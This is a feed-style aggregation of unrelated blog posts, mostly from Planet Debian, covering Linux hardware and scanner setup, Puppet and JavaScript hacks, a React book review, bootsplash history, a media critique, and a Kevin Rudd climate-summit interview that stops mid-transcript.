Sikkimese people are honestly some of the nicest people I’ve ever met. The blend of Lepchas and Bhutias, and the humility and truthfulness Buddhism ingrains in its disciples, is one that’ll make you fall in love with Sikkim (assuming the views, the snow, the fab weather and food leave you pining for more).

As a product of Indian parenting, I’ve always been taught to be wary of the unknown and to stick to the safer, more-travelled path but to be honest, I enjoy bonding with strangers. To me, each person is a storybook waiting to be flipped open with the right questions and the further I get from home, the wilder the stories get. Besides there’s something oddly magical about two arbitrary curvilinear lines briefly running parallel until they diverge to move on to their respective paths. And I think our society has been so busy drawing lines and spreading hate that we forget that in the end, we’re all just lines on the universe’s infinite canvas. So the next time you travel, and you’re in a taxi, a hostel, a bar, a supermarket, or on a long walk to a monastery (that you’re secretly wishing is open despite a lockdown), strike up a conversation with a stranger. Small-talk can go a long way.

Header icon made by Freepik from

Worse Than FailureCodeSOD: Documentation on Your Contract

Josh's company hired a contracting firm to develop an application. This project was initially specced for just a few months of effort, but requirements changed, scope changed, members of the development team changed jobs, new ones needed to be on-boarded. It stretched on for years.

Even through all those changes, though, each new developer on the project followed the same coding standards and architectural principles as the original developers. Unfortunately, those standards were "meh, whatever, it compiled, right?"

So, no, there weren't any tests. No, the code was not particularly readable or maintainable. No, there definitely weren't any comments, at least if you ignore the lines of code that were commented out in big blocks because someone didn't trust source control.

But once the project was finished, the code was given back to Josh's team. "There you are," management said. "You support this now."

Josh and the rest of his team had objections to this. Nothing about the code met their own internal standards for quality, and certainly it wasn't up to the standards specified in the contract.

"Well, yes," management replied, "but we've exhausted the budget."

"Right, but they didn't deliver what the contract was for," the IT team replied.

"Well, yes, but it's a little late to bring that up."

"That's literally your job. We'd fire a developer who handed us this code."

Eventually, management caved on documentation. Things like "code quality" and "robust testing" weren't clearly specified in the contract, and there was too much wiggle room to say, "We robustly tested it, you didn't say automated tests." But documentation was listed in the deliverables, and was quite clearly absent. So management pushed back: "We need documentation." The contractor pushed back in turn: "We need money."

Eventually, Josh's company had to spend more money to get the documentation added to the final product. It was not a trivial sum, as it was a large piece of software, and would take a large number of billable hours to fully document.

This was the result:

/**
 * Program represents a Program and its attributes.
 */


/**
 * Customer represents a Customer and its attributes.
 */


Planet DebianJunichi Uekawa: wake on lan.

wake on lan. I have not been able to get wake-on-LAN working. I wonder if the poweroff command is powering off the system too thoroughly and cutting power to the ethernet as well. Do I need to suspend instead?

Planet DebianJunichi Uekawa: Got a new machine Lenovo ThinkCentre M75s Gen 2, and installed Debian on it.

Got a new machine, a Lenovo ThinkCentre M75s Gen 2, and installed Debian on it. I wanted to try out the Ryzen CPU. I haven't used a physical x86-64 Debian desktop machine since I threw away my Athlon 64 machine (dx5150), so that's like 15 years? Since then my main devices were MacBooks and virtual machines (on GCE and Sakura) and Raspberry Pi. I got Buster installed just fine. Finding the right keystrokes after boot was challenging because the graphical UI doesn't say anything: F1 enters BIOS setup (where I disabled Secure Boot, since I wanted to play with the kernel), and F10 brings up the boot-disk dialog (I needed to choose the entry labeled USB CD drive, although I had put in a USB SD card reader with the installer image). The installation went fine for the console, but getting X up was tricky: support for the graphics (Renoir) part of the chip was only added in kernel 5.5, Buster shipped 4.19, and I wasn't too comfortable with just updating the kernel. I ended up going for a dist-upgrade to Bullseye. With Bullseye's default kernel 5.10, X started without problems. So far I have only tried out Emacs.

Planet DebianDominique Dumont: An improved GUI for cme and Config::Model

I’ve finally found the time to improve the GUI of my pet project: cme (aka Config::Model).

Several years ago, I stumbled on a usability problem in the GUI. Some configurations (like OpenSsh or Systemd) feature a lot of parameters, which means that the GUI displays all of them, so finding a specific parameter can be challenging:

To work around this problem, I added a Filter widget in 2018 which did more or less the job, but it suffered from several bugs which made its behavior confusing.

This is now fixed. The Filter widget is now working in a more consistent way.

In the example below, I’ve typed “IdentityFile” (1) in the Filter widget to show the identityFile used for various hosts (2):

Which is quite good, but some hosts use the default identity file, so no value shows up in the GUI. You can then click the “hide empty value” checkbox to show only the hosts that use a specific identity file:

I hope that this new behavior of the Filter box will make this project more useful.

The improved GUI was released with Config::Model::TkUI 1.374. This new version is available on CPAN and on Debian/experimental. It will be released on Debian/unstable once the next Debian version is out.

All the best

Planet DebianSteinar H. Gunderson: JavaScript madness

Yesterday, I had the problem that while talking to a given server endpoint (which I do not control) from the browser would work just fine, talking to the same server from Node.js would just give hangs and/or inscrutable “7:::1” messages (which I later learned meant “handshake missing”).

To skip six hours of debugging: the server set a cookie in the initial HTTP handshake, and expected to get it back when opening a WebSocket, presumably to steer the connection to the same backend that got the handshake. (Chrome didn't show the cookie in the WS debugging, but Firefox did.) So we need to keep track of those cookies, while still remaining on 0.9.5 (for stupid reasons). No fear, we add this incredibly elegant bit of code:

var io = require('');
// Hook into XHR to pick out the cookie when we receive it.
var my_cookie;
io.util.request = function() {
        var XMLHttpRequest = require('xmlhttprequest').XMLHttpRequest;
        var xhr = new XMLHttpRequest();
        const old_send = xhr.send;
        xhr.send = function() {
                // Add our own readyStateChange hook in front, to get the cookie if we don't have it.
                xhr.old_onreadystatechange = xhr.onreadystatechange;
                xhr.onreadystatechange = function() {
                        if (xhr.readyState == xhr.HEADERS_RECEIVED) {
                                const cookie = xhr.getResponseHeader('set-cookie');
                                if (cookie) {
                                        my_cookie = cookie[0].split(';')[0];
                                }
                        }
                        if (xhr.old_onreadystatechange) {
                                xhr.old_onreadystatechange.apply(xhr, arguments);
                        }
                };
                // Set the cookie if we have it.
                if (my_cookie) {
                        xhr.setRequestHeader("Cookie", my_cookie);
                }
                return old_send.apply(xhr, arguments);
        };
        return xhr;
};

// Now override the WebSockets transport to include our header.
io.Transport['websocket'].prototype.open = function() {
        const query = io.util.query(this.socket.options.query);
        const WebSocket = require('ws');
        // Include our cookie.
        let options = {};
        if (my_cookie) {
                options['headers'] = { 'Cookie': my_cookie };
        }
        this.websocket = new WebSocket(this.prepareUrl() + query, options);
        // The rest is just repeated from the existing function.
        const self = this;
        this.websocket.onopen = function () {
                self.onOpen();
                self.socket.setBuffer(false);
        };
        this.websocket.onmessage = function (ev) {
                self.onData(ev.data);
        };
        this.websocket.onclose = function () {
                self.onClose();
                self.socket.setBuffer(true);
        };
        this.websocket.onerror = function (e) {
                self.onError(e);
        };
        return this;
};

// And now, finally!
var socket = io.connect('', { transports: ['websocket'] });

It's a reminder that talking HTTP and executing JavaScript does not make you into a (headless) browser. And that you shouldn't let me write JavaScript. :-)

(Apologies for the lack of blank lines; evidently, they confuse Markdown.)

Planet DebianRussell Coker: Scanning with a MFC-9120CN on Bullseye

I previously wrote about getting a Brother MFC-9120CN multifunction printer/scanner to print on Linux [1]. I had also got it scanning which I didn’t blog about.

I recently upgraded that Linux system to Debian/Testing (which will soon be released as Debian/Bullseye) and scanning broke. The command sane-find-scanner would find the USB connected scanner, with the following output, but “scanimage -L” didn’t:

found USB scanner (vendor=0x04f9, product=0x021d) at libusb:003:002

It turned out that I had to edit /etc/sane.d/dll.d/hplip which had a single uncommented line of “hpaio” and replace that with “brother3” to make SANE load the driver /usr/lib64/sane/ from the brscan3 package (which Brother provided from their web site years ago).
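For reference, the whole fix is a one-line change to SANE's backend dispatch configuration. A sketch of the file contents (the hplip file name and the brother3 backend match the setup described above; paths and names may differ on other systems):

```shell
# /etc/sane.d/dll.d/hplip
# before (loads only the HP backend):
#   hpaio
# after (loads the Brother brscan3 backend instead):
brother3
```

After the edit, “scanimage -L” should list the scanner again.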

I have the following script to do the scanning (which can run as non-root):

#!/bin/bash
set -e
if [ "$1" == "" ]; then
  echo "specify output filename"
  exit 1
fi

TMP=$(mktemp)
scanimage > $TMP
convert $TMP $1
rm $TMP

Final Note

This blog post doesn’t describe everything that needs to be done to set up a scanner; I already had part of it set up from 10 years ago. But for anyone who finds this after having trouble, /etc/sane.d/dll.d is one place you should look for important configuration (especially if sane-find-scanner works and “scanimage -L” fails). Also, the Brother drivers are handy to have, although I apparently had it working in the past with the hpaio driver from HP (the Brother device emulates an HP device).

Planet DebianRuss Allbery: Review: Learning React

Review: Learning React, by Alex Banks & Eve Porcello

Publisher: O'Reilly
Copyright: June 2020
ISBN: 1-4920-5172-1
Format: Trade paperback
Pages: 287

My first JavaScript project was a React frontend to a REST service. As part of that project, I read two books: JavaScript: The Definitive Guide to learn the language foundation and this book to learn the framework on top of it. This was an unintentional experiment in the ways programming books can approach the topic.

I commented in my review of JavaScript: the Definitive Guide that it takes the reference manual approach to the language. Learning React is the exact opposite. It's goal-driven, example-heavy, and has a problem and solution structure. The authors present a sample application, describe some desired new feature or deficiency in it, and then introduce the specific React technique that solves that problem. There is some rewriting of previous examples using more sophisticated techniques, but most chapters introduce new toy applications along with new parts of the React framework.

The best part of this book is its narrative momentum, so I think the authors were successful at their primary goal. The first eight chapters of the book (more on the rest of the book in a moment) feel like a whirlwind tour where one concept flows naturally into the next and one's questions while reading about one technique are often answered in the next section. I thought the authors tried too hard in places and overdid the enthusiasm, but it's very readable in a way that I think may appeal to people who normally find programming books dry. Learning React is also firm and definitive about the correct way to use React, which may appeal to readers who only want to learn the preferred way of using the framework. (For example, React class components are mentioned briefly, mostly to tell the reader not to use them, and the rest of the book only uses functional components.)

I had two major problems with this book, however. The first is that this breezy, narrative style turns out to be awful when one tries to use it as a reference. I read through most of this book with both enjoyment and curiosity, sat down to write a React component, and immediately struggled to locate the information I needed. Everything felt logically connected when I was focusing on the problems the authors introduced, but as soon as I started from my own problem, the structure of the book fell apart. I had to page through chapters to locate some nugget buried in the text, or re-read sections of the book to piece together which motivating problem my code was most similar to. It was a frustrating experience.

This may be a matter of learning style, since this is why I prefer programming books with a reference structure. But be warned that I can't recommend this book as a reference while you're programming, nor does it prepare you to use the official React documentation as a reference.

The second problem is less explicable and less defensible. I don't know what happened with O'Reilly's copy-editing for this book, but the code snippets are a train wreck. The Amazon reviews are full of people complaining about typos, syntax errors, omitted code, and glaring logical flaws, and they are entirely correct. It's so bad that I was left wondering if a very early, untested draft of the examples was somehow substituted into the book at the last minute by mistake.

I'm not the sort of person who normally types code in from a book, so I don't care about a few typos or obvious misprints as long as the general shape is correct. The general shape was not correct. In a few places, the code is so completely wrong and incomplete that even combined with the surrounding text I was unable to figure out what it was supposed to be. It's possible this is fixed in a later printing (I read the June 2020 printing of the second edition), but otherwise beware. The authors do include a link to a GitHub repository of the code samples, which are significantly different than what's printed in the book, but that repository is incomplete; many of the later chapter examples are only links to JavaScript web sandboxes, which bodes poorly for the longevity of the example code.

And then there's chapter nine of this book, which I found entirely baffling. This is a direct quote from the start of the chapter:

This is the least important chapter in this book. At least, that's what we've been told by the React team. They didn't specifically say, "this is the least important chapter, don't write it." They've only issued a series of tweets warning educators and evangelists that much of their work in this area will very soon be outdated. All of this will change.

This chapter is on suspense and error boundaries, with a brief mention of Fiber. I have no idea what I'm supposed to do with this material as a reader who is new to React (and thus presumably the target audience). Should I use this feature? When? Why is this material in the book at all when it's so laden with weird stream-of-consciousness disclaimers? It's a thoroughly odd editorial choice.

The testing chapter was similarly disappointing in that it didn't answer any of my concrete questions about testing. My instinct with testing UIs is to break out Selenium and do integration testing with its backend, but the authors are huge fans of unit testing of React applications. Great, I thought, this should be interesting; unit testing seems like a poor fit for UI code because of how artificial the test construction is, but maybe I'm missing some subtlety. Convince me! And then the authors... didn't even attempt to convince me. They just asserted unit testing is great and explained how to write trivial unit tests that serve no useful purpose in a real application. End of chapter. Sigh.

I'm not sure what to say about this book. I feel like it has so many serious problems that I should warn everyone away from it, and yet the narrative introduction to React was truly fun to read and got me excited about writing React code. Even though the book largely fell apart as a reference, I still managed to write a working application using it as my primary reference, so it's not all bad. If you like the problem and solution style and want a highly conversational and informal tone (that errs on the side of weird breeziness), this may still be the book for you. Just be aware that the code examples are a trash fire, so if you learn from examples, you're going to have to chase them down via the GitHub repository and hope that they still exist (or get a later edition of the book where this problem has hopefully been corrected).

Rating: 6 out of 10

Planet DebianAntoine Beaupré: Lost article ideas

I wrote for LWN for about two years. During that time, I wrote (what seems to me an impressive) 34 articles, but I always had a pile of ideas in the back of my mind. Those are ideas, notes, and scribbles lying around. Some were just completely abandoned because they didn't seem a good fit for LWN.

Concretely, I stored those in branches in a git repository, and used the branch name (and, naively, the last commit log) as indicators of the topic.

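That branch-plus-commit-log scheme can be dumped with a plain git one-liner. This is only a sketch: it assumes the same `refs/remotes/private/*` layout shown in the listing that follows.

```shell
# Sketch: list every ref under refs/remotes/private with its short
# commit id and its last commit subject, roughly reproducing the
# listing below. Harmless (empty output) if no such refs exist.
git for-each-ref refs/remotes/private \
    --format='%(refname:short) %(objectname:short) %(contents:subject)'
```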
This was the state of affairs when I left:

remotes/private/attic/novena                    822ca2bb add letter i sent to novena, never published
remotes/private/attic/secureboot                de09d82b quick review, add note and graph
remotes/private/attic/wireguard                 5c5340d1 wireguard review, tutorial and comparison with alternatives
remotes/private/backlog/dat                     914c5edf Merge branch 'master' into backlog/dat
remotes/private/backlog/packet                  9b2c6d1a ham radio packet innovations and primer
remotes/private/backlog/performance-tweaks      dcf02676 config notes for http2
remotes/private/backlog/serverless              9fce6484 postponed until kubecon europe
remotes/private/fin/cost-of-hosting             00d8e499 cost-of-hosting article online
remotes/private/fin/kubecon                     f4fd7df2 remove published or spun off articles
remotes/private/fin/kubecon-overview            21fae984 publish kubecon overview article
remotes/private/fin/kubecon2018                 1edc5ec8 add series
remotes/private/fin/netconf                     3f4b7ece publish the netconf articles
remotes/private/fin/netdev                      6ee66559 publish articles from netdev 2.2
remotes/private/fin/pgp-offline                 f841deed pgp offline branch ready for publication
remotes/private/fin/primes                      c7e5b912 publish the ROCA paper
remotes/private/fin/runtimes                    4bee1d70 prepare publication of runtimes articles
remotes/private/fin/token-benchmarks            5a363992 regenerate timestamp automatically
remotes/private/ideas/astropy                   95d53152 astropy or python in astronomy
remotes/private/ideas/avaneya                   20a6d149 crowdfunded blade-runner-themed GPLv3 simcity-like simulator
remotes/private/ideas/backups-benchmarks        fe2f1f13 review of backup software through performance and features
remotes/private/ideas/cumin                     7bed3945 review of the cumin automation tool from WM foundation
remotes/private/ideas/future-of-distros         d086ca0d modern packaging problems and complex apps
remotes/private/ideas/on-dying                  a92ad23f another dying thing
remotes/private/ideas/openpgp-discovery         8f2782f0 openpgp discovery mechanisms (WKD, etc), thanks to jonas meurer
remotes/private/ideas/password-bench            451602c0 bruteforce estimates for various password patterns compared with RSA key sizes
remotes/private/ideas/prometheus-openmetrics    2568dbd6 openmetrics standardizing prom metrics enpoints
remotes/private/ideas/telling-time              f3c24a53 another way of telling time
remotes/private/ideas/wallabako                 4f44c5da talk about wallabako, read-it-later + kobo hacking
remotes/private/stalled/bench-bench-bench       8cef0504 benchmarking http benchmarking tools
remotes/private/stalled/debian-survey-democracy 909bdc98 free software surveys and debian democracy, volunteer vs paid work

Wow, what a mess! Let's see if I can make sense of this:


Those are articles that I thought about, then finally rejected, either because it didn't seem worth it, or my editors rejected it, or I just moved on:

  • novena: the project is ooold now, didn't seem to fit a LWN article. it was basically "how can i build my novena now" and "you guys rock!" it seems like the MNT Reform is the brainchild of the Novena now, and I dare say it's even cooler!
  • secureboot: my LWN editors were critical of my approach, and probably rightly so - it's a really complex subject and I was probably out of my depth... it's also out of date now, we did manage secureboot in Debian
  • wireguard: LWN ended up writing extensive coverage, and I was biased against Donenfeld because of conflicts in a previous project


Those were articles I was planning to write about next.

  • dat: I already had written Sharing and archiving data sets with Dat, but it seems I had more to say... mostly performance issues, beaker, no streaming, limited adoption... to be investigated, I guess?
  • packet: a primer on data communications over ham radio, and the cool new tech that has emerged in the free software world. those are mainly notes about Pat, Direwolf, APRS and so on... just never got around to making sense of it or really using the tech...
  • performance-tweaks: "optimizing websites at the age of http2", the unwritten story of the optimization of this website with HTTP/2 and friends
  • serverless: god. one of the leftover topics at Kubecon, my notes on this were thin, and the actual subject, possibly even thinner... the only lie worse than the cloud is that there's no server at all! concretely, that's a pile of notes about Kubecon which I wanted to sort through. Probably belongs in the attic now.


Those are finished articles, they were published on my website and LWN, but the branches were kept because previous drafts had private notes that should not be published.


A lot of those branches were actually just an empty commit, with the commitlog being the "pitch", more or less. I'd send that list to my editors, sometimes with a few more links (basically the above), and they would nudge me one way or the other.

Sometimes they would actively discourage me from writing about something, and I would do it anyway, send them a draft, and they would patiently make me rewrite it until it was a decent article. This was especially hard with the terminal emulator series, which took forever to write and even got my editors upset when they realized I had never installed Fedora (I ended up installing it, and I was proven wrong!)


Oh, and then there's those: those are either "ideas" or "backlog" that got so far behind that I just moved them out of the way because I was tired of seeing them in my list.

  • stalled/bench-bench-bench benchmarking http benchmarking tools, a horrible mess of links, copy-paste from terminals, and ideas about benchmarking... some of this trickled out into this benchmarking guide at Tor, but not much more than the list of tools
  • stalled/debian-survey-democracy: "free software surveys and Debian democracy, volunteer vs paid work"... A long-standing concern of mine is that all Debian work is supposed to be volunteer, and paying explicitly for work inside Debian has traditionally been frowned upon, even leading to serious drama and dissent (remember Dunc-Tank?). Back when I was writing for LWN, I was also doing paid work for Debian LTS. I also learned that a lot (most?) of Debian Developers were actually being paid by their job to work on Debian. So I was confused by this apparent contradiction, especially given how the LTS project has been mostly accepted, while Dunc-Tank was not... See also this talk at Debconf 16. I had hoped that this study would confirm the "hunch" people have offered (that most DDs are paid to work on Debian) but it seems to show the reverse (only 36% of DDs, and 18% of all respondents, are paid). So I am still confused and worried about the sustainability of Debian.

What do you think?

So that's all I got. As people might have noticed here, I have much less time to write these days, but if there's any subject in there I should pick, what is the one that you would find most interesting?

Oh! and I should mention that you can write to LWN! If you think people should know more about some Linux thing, you can get paid to write for it! Pitch it to the editors, they won't bite. The worst that can happen is that they say "yes" and there goes two years of your life learning to write. Because no, you don't know how to write, no one does. You need an editor to write.

That's why this article looks like crap and has a smiley. :)


Planet DebianGunnar Wolf: FLISOL • Talking about Jitsi

Every year since 2005 there is a very good, big and interesting Latin American gathering of free-software-minded people. Of course, Latin America is a big, big, big place, and it’s not like we are the most economically buoyant region, able to meet in something comparable to FOSDEM.

What we have is a distributed free software conference — originally, a distributed Linux install-fest (which I never liked; I am against install-fests), but it gradually morphed into a proper conference: the Festival Latinoamericano de Instalación de Software Libre (Latin American Free Software Installation Festival).

This FLISOL was hosted by the always great and always interesting Rancho Electrónico, our favorite local hacklab, and had many other interesting talks.

I like talking about projects where I am involved as a developer… but this time I decided to do otherwise: I presented a talk on the Jitsi videoconferencing server. Why? Because of the relevance videoconferences have had over the last year.

So, without further ado — here is a video I recorded locally of the talk I gave (MKV), as well as the slides (PDF).

Sam VargheseAll the news (apart from the Middle East issue) that’s fit to print

The Saturday Paper — as its name implies — is a weekend newspaper published from Melbourne, Australia. Given this, it rarely has any real news, but some of the features are well-written.

There is a column called Gadfly (again the name would indicate what it is about) which is extremely well-written and is one of the articles that I read every week. It was written for some years by one Richard Ackland, a lawyer with very good writing skills, and is now penned by one Sami Shah, an Indian, who is, again, a good writer. Gadfly is funny and, like most of the opinion content in the paper, is left-oriented.

The same cannot be said of some of the other writers. Karen Middleton and Rick Morton fall into the category of poor writers, though the latter sometimes does provide a story that has not been run anywhere else. Middleton can only be described as a hack.

Mike Seccombe is another of the good writers and, when he figures on the day’s menu, one can be assured that the content will be good. Another good writer, David Marr, has now gone missing; indeed, he is not writing for any newspaper at the moment.

But the one fault line that The Saturday Paper has is that it will never cover the Middle East. The owner, Morry Schwartz [seen below in an image used courtesy of Fairfax], leans towards supporting the right-wing Israeli leader Benjamin Netanyahu and thus, no matter what atrocities are being perpetrated on the Palestinians, you can be assured that not a word will appear in this newspaper.

Critics of the paper avoid mentioning this, in keeping with the habit prevalent in the West, of never saying anything that could be construed as being critical of Israel.

This proclivity of Schwartz was noticed early on and mentioned by a couple of Australian writers. One, Tim Robertson, had this to say when the paper had just started out: “…the Saturday Paper’s coverage of Israel’s assault on Gaza has been conspicuously, well, non-existent. As the death toll rises and more atrocities are committed, the Saturday Paper’s pages remain, to date, devoid of any comment.”

Explaining this, John van Tiggelen, a former editor of The Monthly (another Schwartz publication) said: "I mean, it's seen as a Left-wing publication, but the publisher is very Right-wing on Israel […] And he's very much to the, you know, Benjamin Netanyahu end of politics. So, you can't touch it; just don't touch it. It's a glass wall."

Australian media are very touchy about Israel. One of the country’s better writers, Mike Carlton, lost a plum job with the former Fairfax Media — now absorbed into the publishing and broadcasting firm, Nine Entertainment — when he criticised Israel over one of its attacks on Gaza.

And some supporters of Israel in Melbourne are quite powerful. Fairfax had – and still has – a rather juvenile columnist named Julie Szego. When one of her columns was rejected by the then editor, Paul Ramadge (the staff used to say of him, “Ramadge rhymes with damage”), she ran to Fairfax board member Mark Leibler and requested him to intervene. Hey presto, the column was published.

Of course, it is the prerogative of an editor or owner to keep out what he/she does not want published. But if one is given to describing one's publication as a newspaper and then ignores one of the world's major issues, then one's credibility does tend to suffer.

Planet DebianAntoine Beaupré: A dead game clock

Time flies. Back in 2008, I wrote a game clock. Since then, what was first called "chess clock" was renamed to pychessclock and then Gameclock (2008). It shipped with Debian 6 squeeze (2011), 7 wheezy (4.0, 2013, with a new UI), 8 jessie (5.0, 2015, with a code cleanup, translation, go timers), 9 stretch (2017), and 10 buster (2019), phew! Eight years in Debian over five releases, not bad!

But alas, Debian 11 bullseye (2021) won't ship with Gameclock because both Python 2 and GTK 2 were removed from Debian. I lack the time, interest, and energy to port this program. Even if I could find the time, everyone is on their phone nowadays.

So finding the right toolkit would require some serious thinking about how to make a portable program that can run on Linux and Android. I care less about Mac, iOS, and Windows, but, interestingly, it feels like it wouldn't be much harder to cover those as well if I hit both Linux and Android (which is already hard enough, paradoxically).

(And before you ask, no, Java is not an option for me thanks. If I switch to anything else than Python, it would be Golang or Rust. And I did look at some toolkit options a few years ago, was excited by none.)

So there you have it: that is how software dies, I guess. Alternatives include:

  • Chessclock - really old Ruby which made Gameclock rename
  • Ghronos - also really old Java app
  • Lichess - has a chess clock built into the app
  • Otter - if you squint a little

PS: Monkeysign also suffered the same fate, for what that's worth. Alternatives include caff, GNOME Keysign, and pius. Note that this does not affect the larger Monkeysphere project, which will ship with Debian bullseye.

Planet DebianJoey Hess: here's your shot

The nurse releases my shoulder and drops the needle in a sharps bin, slaps on a smiley bandaid. "And we're done!" Her cheeriness seems genuine but a little strained. There was a long line. "You're all boosted, and here's your vaccine card."

Waiting out the 15 minutes in observation, I look at the card.

Moderna COVID-19/22 vaccine booster
3/21/2025              lot #5829126


(Tear at perforated line.)
- - - - - - - - - - - - - - - - - -

Here's your shot at

       and win

I bite my nails, when I'm not wearing this mask. So I scrub ineffectively at the grainy silver box. Not like the woman across from me, three kids in tow, who's zipping through her sheaf of scratchers.

The message on mine becomes clear: 1 month free Amazon Prime

Ah well.


Planet DebianThomas Goirand: Puppet and OS detection

As you may know, Puppet uses “facter” to get facts about the machine it is about to configure. That’s fine, and a nice concept. One can later use variables in a puppet manifest to do different things depending on what facter tells. For example, the operating system name … oh no! This thing is really stupid … Here’s the code one has to write to be compatible with puppet from version 3 up to 5:

if $::lsbdistcodename == undef {
    # This works around differences between facter versions
    if $facts['os']['lsb'] != undef {
        $distro_codename = $facts['os']['lsb']['distcodename']
    } else {
        $distro_codename = $facts['os']['distro']['codename']
    }
} else {
    $distro_codename = downcase($::lsbdistcodename)
}

Indeed, the global variable $::lsbdistcodename still existed up to Stretch (and is gone in Buster). The global $::facts wasn’t an array before (but a hash), so in Jessie, it breaks with the error message “facts is not a hash or array when accessing it with os”. So, one needs the full code above to make this work.

It’s OK to improve things. It is NOT OK to break OS detection. To me it is a very bad practice from upstream Puppet authors. I’m publishing this in the hope of helping others avoid the trap I fell into.
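For what it’s worth, newer Puppet offers a terser way to express the same fall-through. The following is only a sketch, not from the original manifest: it assumes Puppet >= 4.5 (for the built-in dig() function) and the puppetlabs-stdlib module (for pick_default()), neither of which the version-3-compatible code above can rely on. It also omits the downcase() call for brevity.

```puppet
# Sketch, assuming Puppet >= 4.5 and puppetlabs-stdlib.
# dig() returns undef (instead of failing) when an intermediate key
# is missing, and pick_default() returns its first non-undef argument.
$distro_codename = pick_default(
  $::lsbdistcodename,
  $facts.dig('os', 'lsb', 'distcodename'),
  $facts.dig('os', 'distro', 'codename')
)
```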

Planet DebianMatthew Garrett: An accidental bootsplash

Back in 2005 we had Debconf in Helsinki. Earlier in the year I'd ended up invited to Canonical's Ubuntu Down Under event in Sydney, and one of the things we'd tried to design was a reasonable graphical boot environment that could also display status messages. The design constraints were awkward - we wanted it to be entirely in userland (so we didn't need to carry kernel patches), and we didn't want to rely on vesafb[1] (because at the time we needed to reinitialise graphics hardware from userland on suspend/resume[2], and vesa was not super compatible with that). Nothing currently met our requirements, but by the time we'd got to Helsinki there was a general understanding that Paul Sladen was going to implement this.

The Helsinki Debconf ended up being an extremely strange event, involving me having to explain to Mark Shuttleworth what the physics of a bomb exploding on a bus were, many people being traumatised by the whole sauna situation, and the whole unfortunate water balloon incident, but it also involved Sladen spending a bunch of time trying to produce an SVG of a London bus as a D-Bus logo and not really writing our hypothetical userland bootsplash program, so on the last night, fueled by Koff that we'd bought by just collecting all the discarded empty bottles and returning them for the deposits, I started writing one.

I knew that Debian was already using graphics mode for installation despite having a textual installer, because they needed to deal with more complex fonts than VGA could manage. Digging into the code, I found that it used BOGL - a graphics library that made use of the VGA framebuffer to draw things. VGA had a pre-allocated memory range for the framebuffer[3], which meant the firmware probably wouldn't map anything else there, and hitting those addresses probably wouldn't break anything. This seemed safe.

A few hours later, I had some code that could use BOGL to print status messages to the screen of a machine booted with vga16fb. I woke up some time later, somehow found myself in an airport, and while sitting at the departure gate[4] I spent a while staring at VGA documentation and worked out which magical calls I needed to make to have it behave roughly like a linear framebuffer. Shortly before I got on my flight back to the UK, I had something that could also draw a graphical picture.

Usplash shipped shortly afterwards. We hit various issues - vga16fb produced a 640x480 mode, and some laptops were not inclined to do that without a BIOS call first. 640x400 worked basically everywhere, but meant we had to redraw the art because circles don't work the same way if you change the resolution. My brief "UBUNTU BETA" artwork that was me literally writing "UBUNTU BETA" on an HP TC1100 shortly after I'd got the Wacom screen working did not go down well, and thankfully we had better artwork before release.

But 16 colours is somewhat limiting. SVGALib offered a way to get more colours and better resolution in userland, retaining our prerequisites. Unfortunately it relied on VM86, which doesn't exist in 64-bit mode on Intel systems. I ended up hacking the x86emu into a thunk library that exposed the same API as LRMI, so we could run it without needing VM86. Shockingly, it worked - we had support for 256 colour bootsplashes in any supported resolution on 64 bit systems as well as 32 bit ones.

But by now it was obvious that the future was having the kernel manage graphics support, both in terms of native programming and in supporting suspend/resume. Plymouth is much more fully featured than Usplash ever was, but relies on functionality that simply didn't exist when we started this adventure. There's certainly an argument that we'd have been better off making reasonable kernel modesetting support happen faster, but at this point I had literally no idea how to write decent kernel code and everyone should be happy I kept this to userland.

Anyway. The moral of all of this is that sometimes history works out such that you write some software that a huge number of people run without any idea of who you are, and also that this can happen without you having any fucking idea what you're doing.

Write code. Do crimes.

[1] vesafb relied on either the bootloader or the early stage kernel performing a VBE call to set a mode, and then just drawing directly into that framebuffer. When we were doing GPU reinitialisation in userland we couldn't guarantee that we'd run before the kernel tried to draw stuff into that framebuffer, and there was a risk that that was mapped to something dangerous if the GPU hadn't been reprogrammed into the same state. It turns out that having GPU modesetting in the kernel is a Good Thing.

[2] ACPI didn't guarantee that the firmware would reinitialise the graphics hardware, and as a result most machines didn't. At this point Linux didn't have native support for initialising most graphics hardware, so we fell back to doing it from userland. VBEtool was a terrible hack I wrote to try to re-execute the system's graphics hardware through a range of mechanisms, and it worked in a surprising number of cases.

[3] As long as you were willing to deal with 640x480 in 16 colours

[4] Helsinki-Vantaan had astonishingly comfortable seating for time


Kevin RuddABC NewsRadio: Earth Day Summit

23 APRIL 2021

Topics: US climate summit; Murdoch Royal Commission

Thomas Oriti
Leaders of more than 40 countries have held a global summit overnight on the world’s response to climate change. They spoke of the urgent need to save the planet from global warming and talked of a jobs boom in the coming years from clean energy technologies. It was hosted by the US President Joe Biden. The US made a commitment to reduce carbon emissions by 50% by the year 2030. The UK says it will cut emissions by 75% by 2035. But let’s look at the Australian perspective. Before the summit began, Australia announced it would not be changing its commitment to a 26-28% reduction by the turn of the next decade. Now Kevin Rudd is a former Australian Prime Minister and president of the Asia Society in New York who joins us live now. Mr Rudd, good morning.

Kevin Rudd
Good morning.

Thomas Oriti
Thank you for your time. You have attended similar high-level climate summits in the past. What kind of standing does Australia have with no new commitments overnight?

Kevin Rudd
A deeply diminished standing is the honest response to that, and that’s a reflection of the views of governments around the Western world and frankly in the emerging world as well. Australia can and should do more. And it’s not simply a question of political atmospherics here; there’s basic science involved in this. If we could keep temperature increases globally, on average, to around 1.5 degrees centigrade by the end of this century, then what it means is we have to move to carbon neutrality by mid-century. To get to carbon neutrality by mid-century, we’ve got to radically reduce our carbon emissions before 2030 with new targets. Other countries have done that. Australia is not.

Thomas Oriti
But Scott Morrison would argue that he is doing something. I mean, over the last two days, we’ve seen a combined $1 billion investment in clean technology. And he said to the summit that his government’s focus is a technology-driven approach to mitigating emissions, saying reaching net-zero is based on the how and not the when. I mean, what do you make of that sort of approach, focusing on technology?

Kevin Rudd
Well that’s Mr Morrison catering to his own domestic political constituency rather than an act of appropriate international leadership by the Prime Minister of Australia at a major global summit to bring about real carbon reductions. The bottom line is the planet doesn’t wait for Mr Morrison to say ‘well, hydrogen will come on stream in X year and coal reduction targets will come on-stream in Y year’. The reason why the international community, led by the United States in what has been a remarkably successful summit minus Australia, is talking about mid-century carbon neutrality, and new nationally determined contributions between now and 2030, is to make the mathematics and the science stack up to keep temperature increases within 1.5 degrees. What we’ve heard from Mr Morrison instead is frankly just a bunch of politically driven posturing which doesn’t add up and which I think the international community treats with contempt, which is why he was heard making his contribution so far down the batting order.

Thomas Oriti
